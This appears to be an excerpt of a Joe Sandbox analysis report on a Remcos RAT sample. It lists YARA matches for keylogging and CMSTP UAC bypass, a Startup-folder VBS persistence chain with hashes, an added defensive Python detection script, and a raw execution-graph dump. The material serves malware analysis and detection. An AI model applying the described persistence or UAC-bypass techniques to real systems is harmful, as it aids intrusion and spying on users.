                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 55%, ReversingLabs
                                  • Detection: 67%, Virustotal
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:03:31:35
                                  Start date:08/12/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs"
                                  Imagebase:0x7ff7df310000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:03:31:36
                                  Start date:08/12/2024
                                  Path:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Milburr\Allene.exe"
                                  Imagebase:0x5d0000
                                  File size:885'760 bytes
                                  MD5 hash:6F0604F8A16B94B61D714DFEC11D0358
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true
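                                  The two process entries above describe the persistence chain an analyst would want to alert on: wscript.exe (Target ID 3) executes Allene.vbs from the user's Startup folder and then spawns Allene.exe (Target ID 4) from a directory under AppData\Local, and the MD5 the report lists for that dropped executable can be correlated against a hash already known to the analyst. The script below is an added example and is not part of the Joe Sandbox report or of Joe Security's tooling; it runs that detection logic over process-creation records constructed from the command lines, paths and hashes in the process list. The Sysmon-style field names (Image, ParentProcessId, CommandLine, Hashes) are an assumption about the log format, and the third, benign record is invented to show what is not flagged.

```python
"""Flag the persistence chain seen in the report: a script host running a
script from the Startup folder that then launches an executable out of
%LOCALAPPDATA%. Added example; field names follow Sysmon event ID 1 as an
assumption, and the events are constructed from the report's process list."""

import re

# MD5 the report lists for the dropped copy (Target ID 4); an analyst would
# pass in whatever sample hash they already hold.
KNOWN_BAD_MD5 = "6f0604f8a16b94b61d714dfec11d0358"

STARTUP_DIR_RE = re.compile(
    r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r"\\(wscript|cscript)\.exe$", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)\b", re.IGNORECASE)
LOCALAPPDATA_RE = re.compile(r"\\appdata\\local\\", re.IGNORECASE)

# Constructed process-creation events modelled on Target ID 3 and 4 above,
# plus one benign wscript launch (a logon script from a share) as a control.
EVENTS = [
    {"ProcessId": 3, "ParentProcessId": 1,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs"',
     "Hashes": "MD5=A47CBE969EA935BDD3AB568BB126BC80"},
    {"ProcessId": 4, "ParentProcessId": 3,
     "Image": r"C:\Users\user\AppData\Local\Milburr\Allene.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Milburr\Allene.exe"',
     "Hashes": "MD5=6F0604F8A16B94B61D714DFEC11D0358"},
    {"ProcessId": 5, "ParentProcessId": 1,   # benign control, constructed
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "\\corp\netlogon\map_drives.vbs"',
     "Hashes": "MD5=A47CBE969EA935BDD3AB568BB126BC80"},
]


def md5_of(event):
    """Pull the MD5 out of a Sysmon-style 'Hashes' field, lower-cased."""
    m = re.search(r"MD5=([0-9a-fA-F]{32})", event.get("Hashes", ""))
    return m.group(1).lower() if m else None


def is_startup_script_host(event):
    """wscript/cscript launched with a script that lives in a Startup folder."""
    cmd = event["CommandLine"]
    return bool(SCRIPT_HOST_RE.search(event["Image"])
                and STARTUP_DIR_RE.search(cmd)
                and SCRIPT_EXT_RE.search(cmd))


def detect(events, known_bad_md5=None):
    """Return (finding, pid) tuples for the Startup-script -> LOCALAPPDATA exe chain.

    A match on the script host alone is a medium-confidence signal; a child
    executable under AppData\\Local raises it, and a hash match on that child
    ties it to a sample the analyst already knows."""
    findings = []
    for e in events:
        if not is_startup_script_host(e):
            continue
        findings.append(("startup_script_host", e["ProcessId"]))
        for child in events:
            if (child["ParentProcessId"] == e["ProcessId"]
                    and LOCALAPPDATA_RE.search(child["Image"])
                    and child["Image"].lower().endswith(".exe")):
                findings.append(("startup_script_spawns_localappdata_exe",
                                 child["ProcessId"]))
                if known_bad_md5 and md5_of(child) == known_bad_md5.lower():
                    findings.append(("child_matches_known_sample_hash",
                                     child["ProcessId"]))
    return findings


if __name__ == "__main__":
    for name, pid in detect(EVENTS, KNOWN_BAD_MD5):
        print(f"{name}: pid {pid}")
```

The Startup-folder check is deliberately on the script path in the command line rather than on the .vbs file's existence, since by the time the event is reviewed the file may already have been deleted; extend STARTUP_DIR_RE with the all-users Startup path if your telemetry covers it.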

                                    Execution Graph

                                    Execution Coverage:3.6%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:8.6%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:55
                                    [Execution graph: the node/edge data of the interactive call-graph viewer is omitted here. Windows API calls that appear as graph nodes: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, GetModuleFileNameW, GetModuleHandleExW, GetProcAddress, ExitProcess, LoadLibraryExW, FreeLibrary, VirtualProtect, GetFileAttributesW, CharUpperBuffW, CharLowerBuffW, VariantClear, GetCurrentProcess, TerminateProcess, RaiseException, GetLastError, RtlAllocateHeap, RtlFreeHeap, RtlEncodePointer, RtlDecodePointer, RtlEnterCriticalSection, RtlLeaveCriticalSection, InitializeCriticalSectionAndSpinCount; the remaining nodes are CRT and AutoIt runtime internals (_memmove, _wcscpy, _wcscat, __wsetenvp, __ftell_nolock, __getptd_noexit, std::exception::exception, Mailbox).]
8e4132 104821->104822 104823 887d2c 59 API calls 104821->104823 104824 8879f2 59 API calls 104822->104824 104823->104822 104825 8e413b 104824->104825 104826 8e414b 104825->104826 104827 887d2c 59 API calls 104825->104827 104828 888047 59 API calls 104826->104828 104827->104826 104829 8e4157 104828->104829 104830 887b2e 59 API calls 104829->104830 104831 8e4163 104830->104831 105384 8e4223 59 API calls 104831->105384 104833 8e4172 105385 8e4223 59 API calls 104833->105385 104835 8e4185 104836 8879f2 59 API calls 104835->104836 104837 8e418f 104836->104837 104838 8e41a6 104837->104838 104839 8e4194 104837->104839 104841 8879f2 59 API calls 104838->104841 104840 887cab 59 API calls 104839->104840 104848->104664 104850 8e9162 __ftell_nolock 104849->104850 104851 8a0db6 Mailbox 59 API calls 104850->104851 104852 8e91bf 104851->104852 104853 88522e 59 API calls 104852->104853 104854 8e91c9 104853->104854 104855 8e8f5f GetSystemTimeAsFileTime 104854->104855 104856 8e91d4 104855->104856 104857 884ee5 85 API calls 104856->104857 104858 8e91e7 _wcscmp 104857->104858 104859 8e920b 104858->104859 104860 8e92b8 104858->104860 105416 8e9734 104859->105416 104862 8e9734 96 API calls 104860->104862 104877 8e9284 _wcscat 104862->104877 104865 884f0b 74 API calls 104866 8e92dd 104865->104866 104868 884f0b 74 API calls 104866->104868 104867 8e92c1 104867->104671 104870 8e92ed 104868->104870 104869 8e9239 _wcscat _wcscpy 105423 8a40fb 58 API calls __wsplitpath_helper 104869->105423 104871 884f0b 74 API calls 104870->104871 104873 8e9308 104871->104873 104874 884f0b 74 API calls 104873->104874 104875 8e9318 104874->104875 104876 884f0b 74 API calls 104875->104876 104878 8e9333 104876->104878 104877->104865 104877->104867 104879 884f0b 74 API calls 104878->104879 104880 8e9343 104879->104880 104881 884f0b 74 API calls 104880->104881 104882 8e9353 104881->104882 104883 884f0b 74 API calls 104882->104883 104884 8e9363 104883->104884 105386 8e98e3 GetTempPathW GetTempFileNameW 
104884->105386 104904->104599 104905->104634 104906->104646 104908 884e5b 104907->104908 104909 884e54 104907->104909 104911 884e6a 104908->104911 104912 884e7b FreeLibrary 104908->104912 104910 8a53a6 __fcloseall 83 API calls 104909->104910 104910->104908 104911->104672 104912->104911 104962 884c03 104913->104962 104916 884bdc 104917 884bec FreeLibrary 104916->104917 104918 884bf5 104916->104918 104917->104918 104920 8a525b 104918->104920 104919 884c03 2 API calls 104919->104916 104966 8a5270 104920->104966 104922 884dfc 104922->104722 104922->104723 105123 884c36 104923->105123 104926 884b8f 104927 884baa 104926->104927 104928 884ba1 FreeLibrary 104926->104928 104930 884c70 104927->104930 104928->104927 104929 884c36 2 API calls 104929->104926 104931 8a0db6 Mailbox 59 API calls 104930->104931 104932 884c85 104931->104932 104933 88522e 59 API calls 104932->104933 104934 884c91 _memmove 104933->104934 104935 884d89 104934->104935 104936 884dc1 104934->104936 104940 884ccc 104934->104940 105127 884e89 CreateStreamOnHGlobal 104935->105127 105138 8e991b 95 API calls 104936->105138 104937 884ec7 69 API calls 104946 884cd5 104937->104946 104940->104937 104941 884f0b 74 API calls 104941->104946 104942 884d69 104942->104730 104944 8bd8a7 104945 884ee5 85 API calls 104944->104945 104947 8bd8bb 104945->104947 104946->104941 104946->104942 104946->104944 105133 884ee5 104946->105133 104948 884f0b 74 API calls 104947->104948 104948->104942 104950 884f1d 104949->104950 104951 8bd9cd 104949->104951 105162 8a55e2 104950->105162 104954 8e9109 105360 8e8f5f 104954->105360 104956 8e911f 104956->104738 104958 8bd990 104957->104958 104959 884ed6 104957->104959 105365 8a5c60 104959->105365 104961 884ede 104963 884bd0 104962->104963 104964 884c0c LoadLibraryA 104962->104964 104963->104916 104963->104919 104964->104963 104965 884c1d GetProcAddress 104964->104965 104965->104963 104968 8a527c __initptd 104966->104968 104967 8a528f 105015 8a8b28 58 API calls __getptd_noexit 104967->105015 
104968->104967 104970 8a52c0 104968->104970 104985 8b04e8 104970->104985 104971 8a5294 105016 8a8db6 9 API calls __swprintf 104971->105016 104974 8a52c5 104975 8a52db 104974->104975 104976 8a52ce 104974->104976 104978 8a5305 104975->104978 104979 8a52e5 104975->104979 105017 8a8b28 58 API calls __getptd_noexit 104976->105017 105000 8b0607 104978->105000 105018 8a8b28 58 API calls __getptd_noexit 104979->105018 104984 8a529f __initptd @_EH4_CallFilterFunc@8 104984->104922 104986 8b04f4 __initptd 104985->104986 104987 8a9c0b __lock 58 API calls 104986->104987 104988 8b0502 104987->104988 104989 8b057d 104988->104989 104995 8a9c93 __mtinitlocknum 58 API calls 104988->104995 104998 8b0576 104988->104998 105023 8a6c50 59 API calls __lock 104988->105023 105024 8a6cba RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 104988->105024 105025 8a881d 58 API calls 2 library calls 104989->105025 104992 8b0584 104992->104998 105026 8a9e2b InitializeCriticalSectionAndSpinCount 104992->105026 104993 8b05f3 __initptd 104993->104974 104995->104988 104997 8b05aa RtlEnterCriticalSection 104997->104998 105020 8b05fe 104998->105020 105009 8b0627 __wopenfile 105000->105009 105001 8b0641 105031 8a8b28 58 API calls __getptd_noexit 105001->105031 105003 8b07fc 105003->105001 105007 8b085f 105003->105007 105004 8b0646 105032 8a8db6 9 API calls __swprintf 105004->105032 105006 8a5310 105019 8a5332 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105006->105019 105028 8b85a1 105007->105028 105009->105001 105009->105003 105033 8a37cb 60 API calls 2 library calls 105009->105033 105011 8b07f5 105011->105003 105034 8a37cb 60 API calls 2 library calls 105011->105034 105013 8b0814 105013->105003 105035 8a37cb 60 API calls 2 library calls 105013->105035 105015->104971 105016->104984 105017->104984 105018->104984 105019->104984 105027 8a9d75 RtlLeaveCriticalSection 105020->105027 105022 8b0605 105022->104993 105023->104988 105024->104988 105025->104992 105026->104997 105027->105022 105036 
8b7d85 105028->105036 105030 8b85ba 105030->105006 105031->105004 105032->105006 105033->105011 105034->105013 105035->105003 105039 8b7d91 __initptd 105036->105039 105037 8b7da7 105120 8a8b28 58 API calls __getptd_noexit 105037->105120 105039->105037 105041 8b7ddd 105039->105041 105040 8b7dac 105121 8a8db6 9 API calls __swprintf 105040->105121 105047 8b7e4e 105041->105047 105044 8b7df9 105122 8b7e22 RtlLeaveCriticalSection __unlock_fhandle 105044->105122 105046 8b7db6 __initptd 105046->105030 105048 8b7e6e 105047->105048 105049 8a44ea __wsopen_nolock 58 API calls 105048->105049 105053 8b7e8a 105049->105053 105050 8b7fc1 105051 8a8dc6 __invoke_watson 8 API calls 105050->105051 105052 8b85a0 105051->105052 105054 8b7d85 __wsopen_helper 103 API calls 105052->105054 105053->105050 105055 8b7ec4 105053->105055 105061 8b7ee7 105053->105061 105056 8b85ba 105054->105056 105057 8a8af4 __close 58 API calls 105055->105057 105056->105044 105058 8b7ec9 105057->105058 105059 8a8b28 __swprintf 58 API calls 105058->105059 105060 8b7ed6 105059->105060 105063 8a8db6 __swprintf 9 API calls 105060->105063 105062 8b7fa5 105061->105062 105070 8b7f83 105061->105070 105064 8a8af4 __close 58 API calls 105062->105064 105065 8b7ee0 105063->105065 105066 8b7faa 105064->105066 105065->105044 105067 8a8b28 __swprintf 58 API calls 105066->105067 105068 8b7fb7 105067->105068 105069 8a8db6 __swprintf 9 API calls 105068->105069 105069->105050 105071 8ad294 __alloc_osfhnd 61 API calls 105070->105071 105072 8b8051 105071->105072 105073 8b805b 105072->105073 105074 8b807e 105072->105074 105075 8a8af4 __close 58 API calls 105073->105075 105076 8b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105074->105076 105077 8b8060 105075->105077 105084 8b80a0 105076->105084 105078 8a8b28 __swprintf 58 API calls 105077->105078 105081 8b806a 105078->105081 105079 8b811e GetFileType 105082 8b816b 105079->105082 105083 8b8129 GetLastError 105079->105083 105080 8b80ec GetLastError 105085 8a8b07 
__dosmaperr 58 API calls 105080->105085 105086 8a8b28 __swprintf 58 API calls 105081->105086 105092 8ad52a __set_osfhnd 59 API calls 105082->105092 105087 8a8b07 __dosmaperr 58 API calls 105083->105087 105084->105079 105084->105080 105088 8b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105084->105088 105089 8b8111 105085->105089 105086->105065 105090 8b8150 CloseHandle 105087->105090 105091 8b80e1 105088->105091 105094 8a8b28 __swprintf 58 API calls 105089->105094 105090->105089 105093 8b815e 105090->105093 105091->105079 105091->105080 105098 8b8189 105092->105098 105095 8a8b28 __swprintf 58 API calls 105093->105095 105094->105050 105096 8b8163 105095->105096 105096->105089 105097 8b8344 105097->105050 105100 8b8517 CloseHandle 105097->105100 105098->105097 105099 8b18c1 __lseeki64_nolock 60 API calls 105098->105099 105116 8b820a 105098->105116 105101 8b81f3 105099->105101 105102 8b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105100->105102 105104 8a8af4 __close 58 API calls 105101->105104 105101->105116 105103 8b853e 105102->105103 105105 8b8572 105103->105105 105106 8b8546 GetLastError 105103->105106 105104->105116 105105->105050 105107 8a8b07 __dosmaperr 58 API calls 105106->105107 105110 8b8552 105107->105110 105108 8b0add __close_nolock 61 API calls 105108->105116 105109 8b0e5b 70 API calls __read_nolock 105109->105116 105111 8ad43d __free_osfhnd 59 API calls 105110->105111 105111->105105 105112 8b97a2 __chsize_nolock 82 API calls 105112->105116 105113 8ad886 __write 78 API calls 105113->105116 105114 8b83c1 105115 8b0add __close_nolock 61 API calls 105114->105115 105117 8b83c8 105115->105117 105116->105097 105116->105108 105116->105109 105116->105112 105116->105113 105116->105114 105118 8b18c1 60 API calls __lseeki64_nolock 105116->105118 105119 8a8b28 __swprintf 58 API calls 105117->105119 105118->105116 105119->105050 105120->105040 105121->105046 105122->105046 105124 884b83 105123->105124 105125 884c3f LoadLibraryA 
105123->105125 105124->104926 105124->104929 105125->105124 105126 884c50 GetProcAddress 105125->105126 105126->105124 105128 884ec0 105127->105128 105129 884ea3 FindResourceExW 105127->105129 105128->104940 105129->105128 105130 8bd933 LoadResource 105129->105130 105130->105128 105131 8bd948 SizeofResource 105130->105131 105131->105128 105132 8bd95c LockResource 105131->105132 105132->105128 105134 884ef4 105133->105134 105137 8bd9ab 105133->105137 105139 8a584d 105134->105139 105136 884f02 105136->104946 105138->104940 105143 8a5859 __initptd 105139->105143 105140 8a586b 105152 8a8b28 58 API calls __getptd_noexit 105140->105152 105142 8a5891 105154 8a6c11 105142->105154 105143->105140 105143->105142 105145 8a5870 105153 8a8db6 9 API calls __swprintf 105145->105153 105149 8a587b __initptd 105149->105136 105150 8a58a6 105161 8a58c8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105150->105161 105152->105145 105153->105149 105155 8a6c43 RtlEnterCriticalSection 105154->105155 105156 8a6c21 105154->105156 105157 8a5897 105155->105157 105156->105155 105158 8a6c29 105156->105158 105160 8a57be 83 API calls 5 library calls 105157->105160 105159 8a9c0b __lock 58 API calls 105158->105159 105159->105157 105160->105150 105161->105149 105165 8a55fd 105162->105165 105164 884f2e 105164->104954 105166 8a5609 __initptd 105165->105166 105167 8a561f _memset 105166->105167 105168 8a564c 105166->105168 105170 8a5644 __initptd 105166->105170 105192 8a8b28 58 API calls __getptd_noexit 105167->105192 105169 8a6c11 __lock_file 59 API calls 105168->105169 105171 8a5652 105169->105171 105170->105164 105178 8a541d 105171->105178 105174 8a5639 105193 8a8db6 9 API calls __swprintf 105174->105193 105179 8a5453 105178->105179 105181 8a5438 _memset 105178->105181 105194 8a5686 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105179->105194 105180 8a5443 105290 8a8b28 58 API calls __getptd_noexit 105180->105290 105181->105179 105181->105180 105183 8a5493 105181->105183 105183->105179 
105186 8a55a4 _memset 105183->105186 105195 8a46e6 105183->105195 105202 8b0e5b 105183->105202 105270 8b0ba7 105183->105270 105292 8b0cc8 58 API calls 3 library calls 105183->105292 105293 8a8b28 58 API calls __getptd_noexit 105186->105293 105191 8a5448 105291 8a8db6 9 API calls __swprintf 105191->105291 105192->105174 105193->105170 105194->105170 105196 8a46f0 105195->105196 105197 8a4705 105195->105197 105294 8a8b28 58 API calls __getptd_noexit 105196->105294 105197->105183 105199 8a46f5 105295 8a8db6 9 API calls __swprintf 105199->105295 105201 8a4700 105201->105183 105203 8b0e7c 105202->105203 105204 8b0e93 105202->105204 105305 8a8af4 58 API calls __getptd_noexit 105203->105305 105206 8b15cb 105204->105206 105211 8b0ecd 105204->105211 105321 8a8af4 58 API calls __getptd_noexit 105206->105321 105208 8b0e81 105306 8a8b28 58 API calls __getptd_noexit 105208->105306 105209 8b15d0 105322 8a8b28 58 API calls __getptd_noexit 105209->105322 105213 8b0ed5 105211->105213 105219 8b0eec 105211->105219 105307 8a8af4 58 API calls __getptd_noexit 105213->105307 105214 8b0ee1 105323 8a8db6 9 API calls __swprintf 105214->105323 105215 8b0e88 105215->105183 105217 8b0eda 105308 8a8b28 58 API calls __getptd_noexit 105217->105308 105219->105215 105220 8b0f01 105219->105220 105223 8b0f1b 105219->105223 105224 8b0f39 105219->105224 105309 8a8af4 58 API calls __getptd_noexit 105220->105309 105223->105220 105225 8b0f26 105223->105225 105310 8a881d 58 API calls 2 library calls 105224->105310 105296 8b5c6b 105225->105296 105227 8b0f49 105229 8b0f6c 105227->105229 105230 8b0f51 105227->105230 105313 8b18c1 60 API calls 3 library calls 105229->105313 105311 8a8b28 58 API calls __getptd_noexit 105230->105311 105231 8b103a 105233 8b10b3 ReadFile 105231->105233 105238 8b1050 GetConsoleMode 105231->105238 105236 8b1593 GetLastError 105233->105236 105237 8b10d5 105233->105237 105235 8b0f56 105312 8a8af4 58 API calls __getptd_noexit 105235->105312 105240 8b15a0 105236->105240 105246 8b1093 
105236->105246 105237->105236 105244 8b10a5 105237->105244 105241 8b10b0 105238->105241 105242 8b1064 105238->105242 105319 8a8b28 58 API calls __getptd_noexit 105240->105319 105241->105233 105242->105241 105245 8b106a ReadConsoleW 105242->105245 105252 8b1377 105244->105252 105253 8b1099 105244->105253 105255 8b110a 105244->105255 105245->105244 105249 8b108d GetLastError 105245->105249 105246->105253 105314 8a8b07 58 API calls 3 library calls 105246->105314 105248 8b15a5 105320 8a8af4 58 API calls __getptd_noexit 105248->105320 105249->105246 105251 8a2d55 _free 58 API calls 105251->105215 105252->105253 105260 8b147d ReadFile 105252->105260 105253->105215 105253->105251 105256 8b1176 ReadFile 105255->105256 105262 8b11f7 105255->105262 105257 8b1197 GetLastError 105256->105257 105266 8b11a1 105256->105266 105257->105266 105258 8b12b4 105264 8b1264 MultiByteToWideChar 105258->105264 105317 8b18c1 60 API calls 3 library calls 105258->105317 105259 8b12a4 105316 8a8b28 58 API calls __getptd_noexit 105259->105316 105261 8b14a0 GetLastError 105260->105261 105269 8b14ae 105260->105269 105261->105269 105262->105253 105262->105258 105262->105259 105262->105264 105264->105249 105264->105253 105266->105255 105315 8b18c1 60 API calls 3 library calls 105266->105315 105269->105252 105318 8b18c1 60 API calls 3 library calls 105269->105318 105271 8b0bb2 105270->105271 105274 8b0bc7 105270->105274 105357 8a8b28 58 API calls __getptd_noexit 105271->105357 105273 8b0bb7 105358 8a8db6 9 API calls __swprintf 105273->105358 105276 8b0bfc 105274->105276 105284 8b0bc2 105274->105284 105359 8b5fe4 58 API calls __malloc_crt 105274->105359 105278 8a46e6 __flsbuf 58 API calls 105276->105278 105279 8b0c10 105278->105279 105324 8b0d47 105279->105324 105281 8b0c17 105282 8a46e6 __flsbuf 58 API calls 105281->105282 105281->105284 105283 8b0c3a 105282->105283 105283->105284 105285 8a46e6 __flsbuf 58 API calls 105283->105285 105284->105183 105286 8b0c46 105285->105286 105286->105284 105287 
8a46e6 __flsbuf 58 API calls 105286->105287 105288 8b0c53 105287->105288 105289 8a46e6 __flsbuf 58 API calls 105288->105289 105289->105284 105290->105191 105291->105179 105292->105183 105293->105191 105294->105199 105295->105201 105297 8b5c83 105296->105297 105298 8b5c76 105296->105298 105300 8b5c8f 105297->105300 105301 8a8b28 __swprintf 58 API calls 105297->105301 105299 8a8b28 __swprintf 58 API calls 105298->105299 105302 8b5c7b 105299->105302 105300->105231 105303 8b5cb0 105301->105303 105302->105231 105304 8a8db6 __swprintf 9 API calls 105303->105304 105304->105302 105305->105208 105306->105215 105307->105217 105308->105214 105309->105217 105310->105227 105311->105235 105312->105215 105313->105225 105314->105253 105315->105266 105316->105253 105317->105264 105318->105269 105319->105248 105320->105253 105321->105209 105322->105214 105323->105215 105325 8b0d53 __initptd 105324->105325 105326 8b0d60 105325->105326 105327 8b0d77 105325->105327 105328 8a8af4 __close 58 API calls 105326->105328 105329 8b0e3b 105327->105329 105332 8b0d8b 105327->105332 105331 8b0d65 105328->105331 105330 8a8af4 __close 58 API calls 105329->105330 105333 8b0dae 105330->105333 105334 8a8b28 __swprintf 58 API calls 105331->105334 105335 8b0da9 105332->105335 105336 8b0db6 105332->105336 105343 8a8b28 __swprintf 58 API calls 105333->105343 105340 8b0d6c __initptd 105334->105340 105337 8a8af4 __close 58 API calls 105335->105337 105338 8b0dd8 105336->105338 105339 8b0dc3 105336->105339 105337->105333 105342 8ad206 ___lock_fhandle 59 API calls 105338->105342 105341 8a8af4 __close 58 API calls 105339->105341 105340->105281 105344 8b0dc8 105341->105344 105345 8b0dde 105342->105345 105349 8b0dd0 105343->105349 105346 8a8b28 __swprintf 58 API calls 105344->105346 105347 8b0df1 105345->105347 105348 8b0e04 105345->105348 105346->105349 105350 8b0e5b __read_nolock 70 API calls 105347->105350 105352 8a8b28 __swprintf 58 API calls 105348->105352 105351 8a8db6 __swprintf 9 API calls 105349->105351 
